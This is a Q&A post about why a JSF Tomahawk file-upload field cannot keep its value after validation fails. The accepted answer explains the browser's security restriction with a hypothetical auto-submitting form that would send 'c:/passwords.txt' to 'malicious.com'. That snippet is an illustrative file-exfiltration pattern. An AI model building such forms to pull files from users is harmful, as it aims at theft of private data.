# JSF <t:inputFileUpload> value lost after validation failure

Tags: jsf, file-upload, tomahawk

I found value of upload file path is lost after validation for following code. Is there anyway i can retain the value after validation failure? thank you.

```
<t:inputFileUpload id="uploadFile" value="#{backBean.uploadFile}" storage="file" required="false" />
```

Answer (score 4, accepted):

That's not possible. That's a security restriction by HTML. You cannot prefill/preserve the value of a HTML `<input type="file">` field. Since JSF just generates HTML, JSF can't do much about it.

Imagine that this security restriction didn't exist, websites would be able to do the following:

```
<form id="tryToGetPasswords" action="http://malicious.com" method="post" enctype="multipart/form-data">
    <input type="file" name="file" value="c:/passwords.txt" />
</form>
<script>document.getElementById('tryToGetPasswords').submit();</script>
```

Do you see?